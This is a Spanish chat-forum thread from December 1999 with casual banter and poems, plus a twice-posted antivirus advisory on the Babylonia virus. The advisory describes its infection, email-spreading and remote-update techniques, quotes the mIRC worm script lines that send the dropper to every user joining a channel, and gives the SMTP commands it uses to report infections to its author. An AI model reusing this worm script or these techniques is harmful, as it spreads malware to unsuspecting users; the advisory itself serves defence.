| Ref: Luna puesto el 22/12/99 0:00 |
| Otra noches SOLA. SOLA SOLA |
| Ref: Luna puesto el 22/12/99 0:01 |
| Otra noches SOLA. SOLA SOLA |
| Ref: Luna puesto el 22/12/99 0:01 |
| Otra noche SOLA. |
| Ref: yoi puesto el 22/12/99 0:02 |
| ¡¡ Buenas noches !! ¡ que nó, que nostas sola !!1 |
| Ref: Luna puesto el 22/12/99 0:03 |
| sola........................... |
| Ref: Luna puesto el 22/12/99 0:04 |
| Cuarto creciente |
| Ref: Luna puesto el 22/12/99 0:04 |
| Cuarto menguante |
| Ref: Luna puesto el 22/12/99 0:04 |
| pluf! |
| Ref: yoi puesto el 22/12/99 0:06 |
| ¿solo dices ?? |
| Ref: Luna puesto el 22/12/99 0:06 |
| Yoyiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii! |
| Ref: Luna puesto el 22/12/99 0:07 |
| sola, sola, sola, sola |
| Ref: yoi puesto el 22/12/99 0:08 |
| ¿sí ?? |
| Ref: Luna puesto el 22/12/99 0:08 |
| Nadie.... |
| Ref: Luna puesto el 22/12/99 0:08 |
| esta |
| Ref: Luna puesto el 22/12/99 0:08 |
| más |
| Ref: Luna puesto el 22/12/99 0:08 |
| sola |
| Ref: Luna puesto el 22/12/99 0:08 |
| en el mundo |
| Ref: Luna puesto el 22/12/99 0:09 |
| que la Luna. |
| Ref: Luna puesto el 22/12/99 0:12 |
| mi melena negra |
| Ref: Luna puesto el 22/12/99 0:12 |
| como la noche |
| Ref: Luna puesto el 22/12/99 0:12 |
| mis pechos |
| Ref: Luna puesto el 22/12/99 0:12 |
| encendidos |
| Ref: Luna puesto el 22/12/99 0:13 |
| no la alumbraran |
| Ref: Luna puesto el 22/12/99 0:14 |
| y me oculto, de nuevo, sola. Aún más sola. ADIOS |
| Ref: Sagitario puesto el 22/12/99 0:14 |
| Bonito |
| Ref: yoi puesto el 22/12/99 0:14 |
| ¡ Vaya !!, esto parece una carrera de desporpositos ... ¿ o es poesía lo que haces ?? |
| Ref: yoi a Luna puesto el 22/12/99 0:15 |
| Es que no funcionaba esto ... Lo debías tener tú bloqueado ... |
| Ref: Vividor puesto el 22/12/99 2:59 |
| Acaba de salir a la luz "Babylonia", el primer virus del mundo capaz de autoactualizarse por Internet por medio de "plug-ins". Un agente infeccioso que, por si lo anterior fuera poco, reúne las habilidades de un i-worm en cuanto a su distribución, de un virus en cuanto a la infección de ficheros, y de un troyano de "backdoor" en lo que a las mencionadas actualizaciones se refiere. El origen de "Babylonia", que ha causado multitud de infecciones en sus primeras horas de difusión por la red, se remonta al grupo de noticias "alt.crackers", cuando el 3 de diciembre fue enviado como fichero adjunto, bajo el nombre "serialz.hlp", en un mensaje con el que se ofrecía a los asiduos una recopilación de 17000 números de serie para registrar de manera ilegal multitud de aplicaciones para Windows de carácter comercial. Lo que en realidad sucede al abrir este fichero de ayuda es que el virus "Babylonia" es ejecutado, y así, éste procede a infectar los ficheros EXE de formato PE (Portable Executable) y HLP (archivos de ayuda de Windows), siempre que la plataforma en la que se estén llevando a cabo estas acciones sea Windows95 o 98, ya que, debido a que parte del código vírico corre bajo "ring-0" (el anillo de prioridad máxima de ejecución) por medio de llamadas a la función API indocumentada "VxDCall", este espécimen restringe su campo de acción dejando fuera a aquellas máquinas que corren con WindowsNT. El responsable de "Babylonia" es un conocido escritor de virus de origen brasileño apodado "Vecna", ex-miembro de grupos como SGWW, de la ex-Unión Soviética, y de los españoles 29A. Este programador, cuya producción para Windows es probablemente la más extensa de un creador de virus independiente, ya dio que hablar tiempo atrás con especímenes tan complejos como "Inca" o "Cocaine", que hoy en día siguen ocupando puestos de relativa significación en las listas oficiales de virus "in the wild". Instalación ----------- Tanto desde aplicaciones de formato PE como desde ficheros HLP, el primer paso del virus consiste en obtener la dirección real de las APIs necesarias para su correcta ejecución, momento a partir del cual "Babylonia" procede a saltar a ring-0 para así, por medio de la redirección de los servicios IFS (acceso a disco) dedicados a la apertura, lectura o modificación de atributos y renombramiento de ficheros, infectar tantas aplicaciones como sea posible. Durante el proceso de instalación en memoria, el virus comprueba la presencia de los monitores antivirus "Spider" (DrWeb) y "AVP" y, en caso de encontrarse activos, intenta parchearlos de manera que les resulte imposible abrir ficheros susceptibles de ser escaneados. De acuerdo con Eugene Kaspersky, debido a un "bug" el virus es incapaz de dejar al "AVP Monitor" fuera de combate, de manera que acaba por desechar la instalación de su código en memoria. De manera paralela, "Babylonia" descomprime, por medio del método "apLib", una aplicación adicional contenida en su código, de 4k de longitud en total, cuyo código inyecta en un nuevo fichero que el virus crea en el directorio raíz con el nombre "BABYLONIA.EXE". Y es precisamente aquí donde radica la mayor particularidad de este espécimen, ya que éste es el componente que permite la instalación de los "plug-ins" víricos. Cuando este portador es ejecutado, su funcionamiento consiste en autorregistrarse como un proceso oculto, copiarse a sí mismo como "KERNEL32.EXE" en el directorio de sistema de Windows, y asegurarse, por medio de la inserción del nombre de esta copia en el registro de configuraciones, de ejecutarse y así mantenerse residente en memoria en cada arranque del ordenador. Propagación ----------- Una vez que "Babylonia" ha "aterrizado" en un ordenador, vemos que su proceso de propagación sigue dos caminos: por un lado, el de la infección de ejecutables y ficheros de ayuda en modo local, y por otro, la difusión por medio de Internet como fichero adjunto a los mensajes salientes de una máquina infectada. La infección de ejecutables afecta a todos los ficheros de formato PE y extensión EXE que son accedidos por medio de las funciones IFS anteriormente enumeradas cuando "Babylonia" se encuentra residente en memoria. Tras una serie de comprobaciones a partir de los datos que se pueden encontrar en la cabecera PE tales como el procesador bajo el cual está diseñada para funcionar la aplicación "víctima" o la existencia de atributos de DLL, el virus determina si el fichero debe ser infectado o no. El método empleado es el del "entry-point obscuring" (EPO), mediante el cual se examina el código del archivo a infectar en busca de una instrucción "call", la cual es parcheada para llamar directamente al código vírico, en lugar de modificar el punto de entrada original de la aplicación. Tras esto, el cuerpo del virus es "colgado" de la última sección del fichero, salvo en caso de que exista una sección con relocaciones, la cual pasaría a ser directamente sobreescrita, evitando así el crecimiento en bytes del tamaño de las aplicaciones infectadas. Por su parte, la infección de ficheros de ayuda afecta a todos los archivos de extensión "HLP". El método de infección es muy similar al del virus "WinHLP.Demo": por medio de un script polimórfico que el virus inserta en la sección "SYSTEM" y del uso indocumentado de la API "EnumWindows", "Babylonia" consigue que su código binario se ejecute cada vez que un fichero de ayuda es abierto a partir de la "aplicación madre" encargada de dicha tarea, "WINHELP.EXE". Ya por último, la propagación por e-mail presenta pocas novedades con respecto a la que ya hemos visto "gracias" a otros i-worms en este mismo servicio de noticias. Así, la misión del virus consiste en localizar el módulo "WSOCK32.DLL" y de parchear la API "send", con el objetivo de monitorizar todo lo que el usuario envía en sus conexiones a Internet. Cuando se trata de un e-mail, a diferencia de otros i-worms, "Babylonia" se limita a adjuntar simplemente una copia de su código, independientemente de si el mensaje saliente ya lleva originalmente algún "attach". Por si esto fuera poco, y con el fin de asegurarse la compatibilidad con cualquier cliente de correo, el virus dispone de sus propias rutinas de codificación para formato UUencode y MIME, una característica sin precedentes en los i-worms que conocemos hasta el momento. El nombre y el icono de los ficheros añadidos por "Babylonia" a los e-mails enviados por el usuario deberían ser distintos dependiendo de la fecha interna de cada ordenador, y así, su autor preparó una serie de iconos y nombres de fichero en función de las distintas celebraciones o festividades que tienen lugar a lo largo del año, tales como Navidades, Pascua o Halloween. Sin embargo, y de acuerdo con Eugene Kaspersky, debido a un "bug" el nombre siempre resulta ser "X-MAS.EXE", y el icono, una cara sonriente de Papá Noël, de manera que la identificación del virus en el momento de su llegada a nuestro ordenador se simplifica al máximo. Una vez que el fichero portador del virus es ejecutado, y como ya es costumbre entre la inmensa mayoría de los i-worms conocidos hasta el momento, la atención del usuario es desviada por medio de un par de cuadros de diálogo que advierten de un error que en realidad no ha tenido lugar. En el caso de "Babylonia", los mensajes son éstos, donde la "xx" del segundo es "95" o "NT", optando siempre por la alternativa que sea distinta a la versión del sistema operativo que posea el usuario que acaba de ejecutar el i-worm: Loader Error API not found! Loader Error Windows xx required! This program will be terminated. Actualización ------------- Sin duda, el aspecto más interesante y más peligroso de este virus radica en su capacidad de actualizarse por medio de Internet. De este modo, su autor puede añadir, quitar o cambiar cualquier rutina o habilidad de su virus, de manera remota, y así hacer que todas las copias de éste se actualicen e incorporen nuevas tecnologías, que podrían incluír, entre otras, la destrucción de datos de un ordenador infectado, haciendo que "Babylonia" funcionase como un mero intérprete de las órdenes de su autor. La técnica consiste en monitorizar la presencia de la aplicación "RNAAPP.EXE", correspondiente al acceso telefónico a redes, de manera que el virus se asegura de que el usuario está a punto de iniciar una conexión a Internet. A partir de aquí, "Babylonia" se dispone a contactar con "sok4ever.zone.ne.jp/vecna", dirección de la que descarga el fichero "virus.txt", que contiene la relación de "plug-ins" que el autor ha ido añadiendo de manera periódica para su proyecto. De acuerdo con la información manejada por HispaSec, "SOK4EVER" es la continuación de "Sources Of Kaos", un servidor de hospedaje gratuito para páginas web con contenidos relacionados con el mundo de los virus informáticos, que fue eliminado por el FBI tras el revuelo causado por la aparición del virus "Melissa". Según acabamos de comprobar, el propio webmaster de "SOK4EVER" ha decidido dar de baja de manera fulminante la cuenta del escritor brasileño Vecna, al percatarse del uso que éste estaba haciendo de su servidor por medio de "Babylonia", de manera que cualquier opción de éste de seguir actualizándose queda descartada de modo tajante, al serle imposible de ahora en adelante dar con la cuenta de su autor, a partir de la cual obtenía los "plug-ins" necesarios. En cualquier caso, en el momento en el que el virus fue descubierto se localizaron cuatro "plug-ins" que con toda probabilidad habrán sido activados en la inmensa mayoría de las máquinas infectadas por "Babylonia". De acuerdo con lo que hemos podido comprobar, estos ficheros poseen un simple formato, compuesto por una cabecera de identificación ("VMOD", que significaría Virus/Vecna MODule) y una referencia a la dirección de inicio de la rutina principal del código a incorporar al virus. Veamos cuál es el cometido de cada uno de estos "plug-ins" que el autor ha conseguido "lanzar". DROPPER.DAT: se limita a comprobar si, aún estando el actualizador vírico activo, "Babylonia" no ha infectado todavía el sistema en que se está ejecutando. En caso afirmativo, el virus procede a correr una aplicación de 17k llamada "INSTALAR.EXE", que activa el virus y se borra a sí misma tras haber sido ejecutada. IRC-WORM.DAT: convierte el virus en un gusano de mIRC con aspecto de parche "Y2K", tras localizar el conocido cliente de IRC en el disco duro de la máquina remota e insertar el siguiente código, por medio del cual se envía a todos los usuarios de un canal en el que se encuentre un usuario infectado: [script] n0=run $mircdir2kBug-MircFix.EXE n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt } n2= /dcc send $nick $mircdir2kbugfix.ini n3= /dcc send $nick $mircdir2kBug-MircFix.EXE n4=} POLL.DAT: envía al autor del virus un e-mail, de manera que éste pueda efectuar un seguimiento de las infecciones que su virus va produciendo a lo largo de Internet. Los comandos enviados por el puerto 25 (SMTP) son los siguientes: HELO rasta.net MAIL FROM: babylonia@rasta.net RCPT TO: babylonia_counter@hotmail.com [...] El cuerpo de los mensajes contiene una frase en portugués: "Quando o mestre chegara?", que significa "¿Cuándo llegará el maestro?", lo que nos hace pensar que el autor se preparaba algún "payload" poco agradable para un futuro no muy lejano y que, por suerte, no llegará a verse consumado. GREETZ.DAT: se limita a modificar el fichero "AUTOEXEC.BAT" con una serie de agradecimientos del autor a otros componentes de la escena vírica, incluyendo al webmaster de "SOK4EVER", quien, como ya hemos comentado, ha dado de baja al autor de "Babylonia" de su servidor. El texto añadido es el siguiente: echo W95/Babylonia by Vecna (c) 1999 echo Greetz to RoadKil and VirusBuster echo Big thankz to sok4ever webmaster echo Abracos pra galera brazuca!!! echo --- echo Eu boto fogo na Babilonia! Consejos -------- Volvemos a remitirnos a las ya clásicas recomendaciones de no abrir o ejecutar ningun archivo que no hayamos solicitado, aún si éste proviniese de fuentes de confianza. Asimismo, recordamos que deben descargar los parches "Y2K" desde las webs corporativas, según su aplicación o sistema. Por último, y no menos importante, se aconseja actualizar los ficheros de firma de los antivirus, especialmente durante estos meses, ya que la llegada del nuevo año parece ser el origen de una ola de nuevos especímenes por lo señalado de la fecha, y para aprovechar la confusión que está provocando el efecto 2000. Desde HispaSec vamos a realizar un seguimiento especial durante estas fechas, del que tendrán cuenta en los próximos días. Instamos a todos nuestros lectores a hacernos partícipes de cualquier infección de la que puedan ser víctimas, y a formar parte activamente del equipo de emergencia que estamos desplegando. Más información: AVP-ES http://www.avp-es.com/noticias/babylonia.html AVP (Karspersky Lab) http://www.kasperskylab.ru/eng/news/press/991207.html Computer Associates http://www.cai.com/press/1999/12/ca_warns_new_class_virus.htm Network Associates http://vil.nai.com/vil/vm10461.asp Panda Software http://www.pandasoftware.es/vernoticia.asp?noticia=505&idioma=1 Sophos http://www.sophos.com/virusinfo/analyses/w95babylonia.html Symantec http://www.sarc.com/avcenter/venc/data/w95.babylonia.html Trend Micro http://www.antivirus.com/vinfo/security/sa120799.htm FELIZ NAVIDAD |
| Ref: Vividor puesto el 22/12/99 3:00 |
| Acaba de salir a la luz "Babylonia", el primer virus del mundo capaz de autoactualizarse por Internet por medio de "plug-ins". Un agente infeccioso que, por si lo anterior fuera poco, reúne las habilidades de un i-worm en cuanto a su distribución, de un virus en cuanto a la infección de ficheros, y de un troyano de "backdoor" en lo que a las mencionadas actualizaciones se refiere. El origen de "Babylonia", que ha causado multitud de infecciones en sus primeras horas de difusión por la red, se remonta al grupo de noticias "alt.crackers", cuando el 3 de diciembre fue enviado como fichero adjunto, bajo el nombre "serialz.hlp", en un mensaje con el que se ofrecía a los asiduos una recopilación de 17000 números de serie para registrar de manera ilegal multitud de aplicaciones para Windows de carácter comercial. Lo que en realidad sucede al abrir este fichero de ayuda es que el virus "Babylonia" es ejecutado, y así, éste procede a infectar los ficheros EXE de formato PE (Portable Executable) y HLP (archivos de ayuda de Windows), siempre que la plataforma en la que se estén llevando a cabo estas acciones sea Windows95 o 98, ya que, debido a que parte del código vírico corre bajo "ring-0" (el anillo de prioridad máxima de ejecución) por medio de llamadas a la función API indocumentada "VxDCall", este espécimen restringe su campo de acción dejando fuera a aquellas máquinas que corren con WindowsNT. El responsable de "Babylonia" es un conocido escritor de virus de origen brasileño apodado "Vecna", ex-miembro de grupos como SGWW, de la ex-Unión Soviética, y de los españoles 29A. Este programador, cuya producción para Windows es probablemente la más extensa de un creador de virus independiente, ya dio que hablar tiempo atrás con especímenes tan complejos como "Inca" o "Cocaine", que hoy en día siguen ocupando puestos de relativa significación en las listas oficiales de virus "in the wild". Instalación ----------- Tanto desde aplicaciones de formato PE como desde ficheros HLP, el primer paso del virus consiste en obtener la dirección real de las APIs necesarias para su correcta ejecución, momento a partir del cual "Babylonia" procede a saltar a ring-0 para así, por medio de la redirección de los servicios IFS (acceso a disco) dedicados a la apertura, lectura o modificación de atributos y renombramiento de ficheros, infectar tantas aplicaciones como sea posible. Durante el proceso de instalación en memoria, el virus comprueba la presencia de los monitores antivirus "Spider" (DrWeb) y "AVP" y, en caso de encontrarse activos, intenta parchearlos de manera que les resulte imposible abrir ficheros susceptibles de ser escaneados. De acuerdo con Eugene Kaspersky, debido a un "bug" el virus es incapaz de dejar al "AVP Monitor" fuera de combate, de manera que acaba por desechar la instalación de su código en memoria. De manera paralela, "Babylonia" descomprime, por medio del método "apLib", una aplicación adicional contenida en su código, de 4k de longitud en total, cuyo código inyecta en un nuevo fichero que el virus crea en el directorio raíz con el nombre "BABYLONIA.EXE". Y es precisamente aquí donde radica la mayor particularidad de este espécimen, ya que éste es el componente que permite la instalación de los "plug-ins" víricos. Cuando este portador es ejecutado, su funcionamiento consiste en autorregistrarse como un proceso oculto, copiarse a sí mismo como "KERNEL32.EXE" en el directorio de sistema de Windows, y asegurarse, por medio de la inserción del nombre de esta copia en el registro de configuraciones, de ejecutarse y así mantenerse residente en memoria en cada arranque del ordenador. Propagación ----------- Una vez que "Babylonia" ha "aterrizado" en un ordenador, vemos que su proceso de propagación sigue dos caminos: por un lado, el de la infección de ejecutables y ficheros de ayuda en modo local, y por otro, la difusión por medio de Internet como fichero adjunto a los mensajes salientes de una máquina infectada. La infección de ejecutables afecta a todos los ficheros de formato PE y extensión EXE que son accedidos por medio de las funciones IFS anteriormente enumeradas cuando "Babylonia" se encuentra residente en memoria. Tras una serie de comprobaciones a partir de los datos que se pueden encontrar en la cabecera PE tales como el procesador bajo el cual está diseñada para funcionar la aplicación "víctima" o la existencia de atributos de DLL, el virus determina si el fichero debe ser infectado o no. El método empleado es el del "entry-point obscuring" (EPO), mediante el cual se examina el código del archivo a infectar en busca de una instrucción "call", la cual es parcheada para llamar directamente al código vírico, en lugar de modificar el punto de entrada original de la aplicación. Tras esto, el cuerpo del virus es "colgado" de la última sección del fichero, salvo en caso de que exista una sección con relocaciones, la cual pasaría a ser directamente sobreescrita, evitando así el crecimiento en bytes del tamaño de las aplicaciones infectadas. Por su parte, la infección de ficheros de ayuda afecta a todos los archivos de extensión "HLP". El método de infección es muy similar al del virus "WinHLP.Demo": por medio de un script polimórfico que el virus inserta en la sección "SYSTEM" y del uso indocumentado de la API "EnumWindows", "Babylonia" consigue que su código binario se ejecute cada vez que un fichero de ayuda es abierto a partir de la "aplicación madre" encargada de dicha tarea, "WINHELP.EXE". Ya por último, la propagación por e-mail presenta pocas novedades con respecto a la que ya hemos visto "gracias" a otros i-worms en este mismo servicio de noticias. Así, la misión del virus consiste en localizar el módulo "WSOCK32.DLL" y de parchear la API "send", con el objetivo de monitorizar todo lo que el usuario envía en sus conexiones a Internet. Cuando se trata de un e-mail, a diferencia de otros i-worms, "Babylonia" se limita a adjuntar simplemente una copia de su código, independientemente de si el mensaje saliente ya lleva originalmente algún "attach". Por si esto fuera poco, y con el fin de asegurarse la compatibilidad con cualquier cliente de correo, el virus dispone de sus propias rutinas de codificación para formato UUencode y MIME, una característica sin precedentes en los i-worms que conocemos hasta el momento. El nombre y el icono de los ficheros añadidos por "Babylonia" a los e-mails enviados por el usuario deberían ser distintos dependiendo de la fecha interna de cada ordenador, y así, su autor preparó una serie de iconos y nombres de fichero en función de las distintas celebraciones o festividades que tienen lugar a lo largo del año, tales como Navidades, Pascua o Halloween. Sin embargo, y de acuerdo con Eugene Kaspersky, debido a un "bug" el nombre siempre resulta ser "X-MAS.EXE", y el icono, una cara sonriente de Papá Noël, de manera que la identificación del virus en el momento de su llegada a nuestro ordenador se simplifica al máximo. Una vez que el fichero portador del virus es ejecutado, y como ya es costumbre entre la inmensa mayoría de los i-worms conocidos hasta el momento, la atención del usuario es desviada por medio de un par de cuadros de diálogo que advierten de un error que en realidad no ha tenido lugar. En el caso de "Babylonia", los mensajes son éstos, donde la "xx" del segundo es "95" o "NT", optando siempre por la alternativa que sea distinta a la versión del sistema operativo que posea el usuario que acaba de ejecutar el i-worm: Loader Error API not found! Loader Error Windows xx required! This program will be terminated. Actualización ------------- Sin duda, el aspecto más interesante y más peligroso de este virus radica en su capacidad de actualizarse por medio de Internet. De este modo, su autor puede añadir, quitar o cambiar cualquier rutina o habilidad de su virus, de manera remota, y así hacer que todas las copias de éste se actualicen e incorporen nuevas tecnologías, que podrían incluír, entre otras, la destrucción de datos de un ordenador infectado, haciendo que "Babylonia" funcionase como un mero intérprete de las órdenes de su autor. La técnica consiste en monitorizar la presencia de la aplicación "RNAAPP.EXE", correspondiente al acceso telefónico a redes, de manera que el virus se asegura de que el usuario está a punto de iniciar una conexión a Internet. A partir de aquí, "Babylonia" se dispone a contactar con "sok4ever.zone.ne.jp/vecna", dirección de la que descarga el fichero "virus.txt", que contiene la relación de "plug-ins" que el autor ha ido añadiendo de manera periódica para su proyecto. De acuerdo con la información manejada por HispaSec, "SOK4EVER" es la continuación de "Sources Of Kaos", un servidor de hospedaje gratuito para páginas web con contenidos relacionados con el mundo de los virus informáticos, que fue eliminado por el FBI tras el revuelo causado por la aparición del virus "Melissa". Según acabamos de comprobar, el propio webmaster de "SOK4EVER" ha decidido dar de baja de manera fulminante la cuenta del escritor brasileño Vecna, al percatarse del uso que éste estaba haciendo de su servidor por medio de "Babylonia", de manera que cualquier opción de éste de seguir actualizándose queda descartada de modo tajante, al serle imposible de ahora en adelante dar con la cuenta de su autor, a partir de la cual obtenía los "plug-ins" necesarios. En cualquier caso, en el momento en el que el virus fue descubierto se localizaron cuatro "plug-ins" que con toda probabilidad habrán sido activados en la inmensa mayoría de las máquinas infectadas por "Babylonia". De acuerdo con lo que hemos podido comprobar, estos ficheros poseen un simple formato, compuesto por una cabecera de identificación ("VMOD", que significaría Virus/Vecna MODule) y una referencia a la dirección de inicio de la rutina principal del código a incorporar al virus. Veamos cuál es el cometido de cada uno de estos "plug-ins" que el autor ha conseguido "lanzar". DROPPER.DAT: se limita a comprobar si, aún estando el actualizador vírico activo, "Babylonia" no ha infectado todavía el sistema en que se está ejecutando. En caso afirmativo, el virus procede a correr una aplicación de 17k llamada "INSTALAR.EXE", que activa el virus y se borra a sí misma tras haber sido ejecutada. IRC-WORM.DAT: convierte el virus en un gusano de mIRC con aspecto de parche "Y2K", tras localizar el conocido cliente de IRC en el disco duro de la máquina remota e insertar el siguiente código, por medio del cual se envía a todos los usuarios de un canal en el que se encuentre un usuario infectado: [script] n0=run $mircdir2kBug-MircFix.EXE n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt } n2= /dcc send $nick $mircdir2kbugfix.ini n3= /dcc send $nick $mircdir2kBug-MircFix.EXE n4=} POLL.DAT: envía al autor del virus un e-mail, de manera que éste pueda efectuar un seguimiento de las infecciones que su virus va produciendo a lo largo de Internet. Los comandos enviados por el puerto 25 (SMTP) son los siguientes: HELO rasta.net MAIL FROM: babylonia@rasta.net RCPT TO: babylonia_counter@hotmail.com [...] El cuerpo de los mensajes contiene una frase en portugués: "Quando o mestre chegara?", que significa "¿Cuándo llegará el maestro?", lo que nos hace pensar que el autor se preparaba algún "payload" poco agradable para un futuro no muy lejano y que, por suerte, no llegará a verse consumado. GREETZ.DAT: se limita a modificar el fichero "AUTOEXEC.BAT" con una serie de agradecimientos del autor a otros componentes de la escena vírica, incluyendo al webmaster de "SOK4EVER", quien, como ya hemos comentado, ha dado de baja al autor de "Babylonia" de su servidor. El texto añadido es el siguiente: echo W95/Babylonia by Vecna (c) 1999 echo Greetz to RoadKil and VirusBuster echo Big thankz to sok4ever webmaster echo Abracos pra galera brazuca!!! echo --- echo Eu boto fogo na Babilonia! Consejos -------- Volvemos a remitirnos a las ya clásicas recomendaciones de no abrir o ejecutar ningun archivo que no hayamos solicitado, aún si éste proviniese de fuentes de confianza. Asimismo, recordamos que deben descargar los parches "Y2K" desde las webs corporativas, según su aplicación o sistema. Por último, y no menos importante, se aconseja actualizar los ficheros de firma de los antivirus, especialmente durante estos meses, ya que la llegada del nuevo año parece ser el origen de una ola de nuevos especímenes por lo señalado de la fecha, y para aprovechar la confusión que está provocando el efecto 2000. Desde HispaSec vamos a realizar un seguimiento especial durante estas fechas, del que tendrán cuenta en los próximos días. Instamos a todos nuestros lectores a hacernos partícipes de cualquier infección de la que puedan ser víctimas, y a formar parte activamente del equipo de emergencia que estamos desplegando. Más información: AVP-ES http://www.avp-es.com/noticias/babylonia.html AVP (Karspersky Lab) http://www.kasperskylab.ru/eng/news/press/991207.html Computer Associates http://www.cai.com/press/1999/12/ca_warns_new_class_virus.htm Network Associates http://vil.nai.com/vil/vm10461.asp Panda Software http://www.pandasoftware.es/vernoticia.asp?noticia=505&idioma=1 Sophos http://www.sophos.com/virusinfo/analyses/w95babylonia.html Symantec http://www.sarc.com/avcenter/venc/data/w95.babylonia.html Trend Micro http://www.antivirus.com/vinfo/security/sa120799.htm FELIZ NAVIDAD |
| Ref: De Robinet puesto el 22/12/99 4:50 |
| Uno se levanta a medianoche a evocar el rostro desconocido de sus amores y se encuentra con que existe un virus llamado "Babilonia" que nos va a jorobar lo spróximos días o semanas, y lo que es peor, la explicación de su génesis, crecimiento y eliminación... vamos, vida y milagros. ¿Dónde queda el romanticismo de la noche? |
| Ref: De Robinet puesto el 22/12/99 4:57 |
| DOVER: A tu salud, por la juerga de ayer por la tarde. Acabo de leer la crónica junglera y está guay,¡ya era hora! :-) POTYS: Me ratifico en lo que pienso y ya te he dicho, tú has nacido para poner la jungla patas arriba. ¡Chapó! |
| Ref: frisky puesto el 22/12/99 9:04 |
| ¿hay alguien? |
| Ref: Julia puesto el 22/12/99 10:04 |
| Carta a los Reyes Magos
Queridos Reyes Magos, como he sido una niña muy buena, y este año solo he hecho de que reír y de que reír, os quiero pedir unas cositas para el año que viene. Quisiera que me traigais un montón de tiempo libre en horas de trabajo para poder webonear a gusto Quisiera que traigais un proveedor de internet que sea barato y que no me pegue el corte cuando le apetezca También, quisiera que me traigais un tipito de esos que a los chicos tanto les gusta, para levantar pasiones a mi paso, que ahora no me hacen ni caso Me gustaría tener ´también un ordenador en casa con conexión a internet para webonear entre plancha y plancha, para entretenerme Me gustaría que me trajéseis un poco de tiempo libre para poder hacer otras cosas que las de rutina. Quisiera que me trajéseis un montón de besos de todos los tamaños, formas y colores para poder repartirlos a conveniencia Quisiera que todo lo anterior fuese verdad, seguro que otro gallo me cantaría Y para terminar, quisiera que a todos los weboneros de pro les traigáis salud y pesetas, además de tiempo para divertirnos en esta casa común, vamos y si os estiráis con la lotería, pues aquella islita de "vacaciones en el mar" con barco incluído, que el resto ya lo pondríamos nosotr@s. Y ya para terminar, pues eso, mucha felicidad para tod@s los habitantes de esta carnicería, y de paso un coche nuevo, que ya me empieza a hacer falta. Se despide Julia, que ha sido muy güena (abstenerse otros comentarios que no puedan ser reales) A ver si luego puedo entrar un rato mas largo. |
| Ref: Potys puesto el 22/12/99 10:16 |
| Wenos días jungla.....pero hoy estoy cabrea.....
Debería haber comprado la lotería en El Corte Inglés que pa' una vez que cae algo!!!!! Pero no pierdo la esperanza....sigo a la escucha!!!! Si me toca... ya os lo haré saber... Julia buenos días... seguro que los reyes te traen lo que has pedio Al retsto de la jungla mañanera, mu' wenos días..... |
| Ref: Van Cram puesto el 22/12/99 11:39 |
| Solo cinco kilitos, para aligerar la hipoteca del barco pirata... no es tanto lo que pido ¿no? |
| Ref: Potys puesto el 22/12/99 12:03 |
| Pos a mi me ha tocao el reintegro por ahora.... tengo que mirar los premios chicos que no me he enterao..... |
| Ref: nh puesto el 22/12/99 12:38 |
| Gúenaaaassssssss
Solo asomo er flequi, ya que además de mis papelotes, veo esto mu tranqui Potys, vaya, buena racha tienes, además de tu "asunto" ayer con Dover, va y te toca er reintegro. Vamos, que no tos podemos decir lo mesmo. Me refiero al reintegro, claro está. Julia, recuerda que hiciste algo más que reir. Y lo del tipito que mencionas, mejor toavía quer que tienes?. Charlyyyyyyyyy, una lata porfa, que me voy al rincón, y espero que Dover haya dejado la braguita azul, aunque es capaz de habersela llevado a casa. Era mucho tiempo esperando esos 20 minutos de gloria. |
| Ref: Dover puesto el 22/12/99 12:40 |
| Toda la mañana intentando sobornar a los niños de S.Ildefonso pa na.
De todas formas, ya se sabe que hoy es el dia internacional de la salud. "Si lo importante es tener salud..." A ver si por lo menos algunos picos quedan por ahi, o alguno de vosotros se haya pasado por Elche de visita. Por el barco de Van, la boda de Charly y Julia, la reforma del rindo de Nh.... Potys todavia estoy en una nube por lo de ayer, eso si es que te toque la loteria ;-) Un saludo a tod@s!!!!!!!!!!! |
| Ref: Dover puesto el 22/12/99 12:42 |
| Nh !!! Amigo!!!! Viste que suerte tengo?
Por supuesto que estan en el rincon!!!!, es la pieza mas valiosa del museo. Ultimamente tampoco coincidimos mucho. A ver si dejas de trabajar tanto, que te va ha terminar gustando jejeje |
| Ref: nh a dover puesto el 22/12/99 12:47 |
| Anoche lei tu encuentro con la querida y deseada pantera, y me emosiono ver que por fin llego tu momento de gloria
espero dejases en el rincon las braguitas, que por mucho que las busco no las veo, y además faltan algunas de gratos recuerdos qué dira la simpar |
| Ref: Potys puesto el 22/12/99 12:49 |
| Buenos días muchachotes........
Dover yo no estoy.... lo que ves es la sombra de la pantera.......estoy en la camita calentita...que hoy hace un poco de frio...... Nh cariño.....con las 3000 pelas me da pa' invitaros a los dos a unas cañitas y alguna tapita que otra..... que aquí se paga to'... |
| Ref: Dover puesto el 22/12/99 12:51 |
| Nh, ves como valia la pena esperar. Encuanto a las braguitas te aseguro que estan alli. No nos las habran robado?.
La sin par no es celosa jejeje. Dulce sombra la que veo.....por cierto, me apunto a esas tapitas. Pongo la mesa? |
| Ref: Charly puesto el 22/12/99 12:54 |
| Mardita sea mi estampa!!!!, me acaba de llamar mi agente sobornador, y me confirma que lo que soborné no fue a un niño de San Ildefonso, sino a un niño que es un santo y que se llama Ildefonso, que debe vivir por Cuenca más o menos. Conclusión, sigo probe y ya más nadie quiere casarse conmigo buaaaaa!!!! Hola a todos y a todas (incluída la de la carta a los Reyes Majos) |
| Ref: Potys puesto el 22/12/99 12:56 |
| Claro cariño.....
parece que nuestros jefes se
están volviendo buenos por
navidad eh???????
dios mio!!! Yo y mis braguitas... Quién las tiene ahora???? A ver que yo me entere.... |
| Ref: Dover puesto el 22/12/99 13:00 |
| Tranquilo Charly no eres el unico al que han engañado con la loteria. Pero nada ahora nos montamos un sarao en el rincon y asunto resuelto. Llama a Julia y a MIGA, tu Nh llama a Tanit y calentita, yo me encargo de avisar al pirata y a Robinet, yu Potys llamas a las sirenitas y a Rhomer, vale?.
Es cierto Potys, perece que nuestros jefes estan magnanimos, yo creo que los han abducido y nos los han cambiado. |
| Ref: Dover puesto el 22/12/99 13:05 |
| Ya esta todo preparado...
Bebida..listo Canapes..preparados Musica,musica..leche la musica. Yoi de la que vienes taret algunos cds guapos, ah!!! y hielo. |
| Ref: Dover puesto el 22/12/99 13:07 |
| Esto es perfecto yoi.
Bueno venga !!! Os estoy esperando!!! No me hagais sacar la cuerda, que es peor... |
| Ref: Potys puesto el 22/12/99 13:11 |
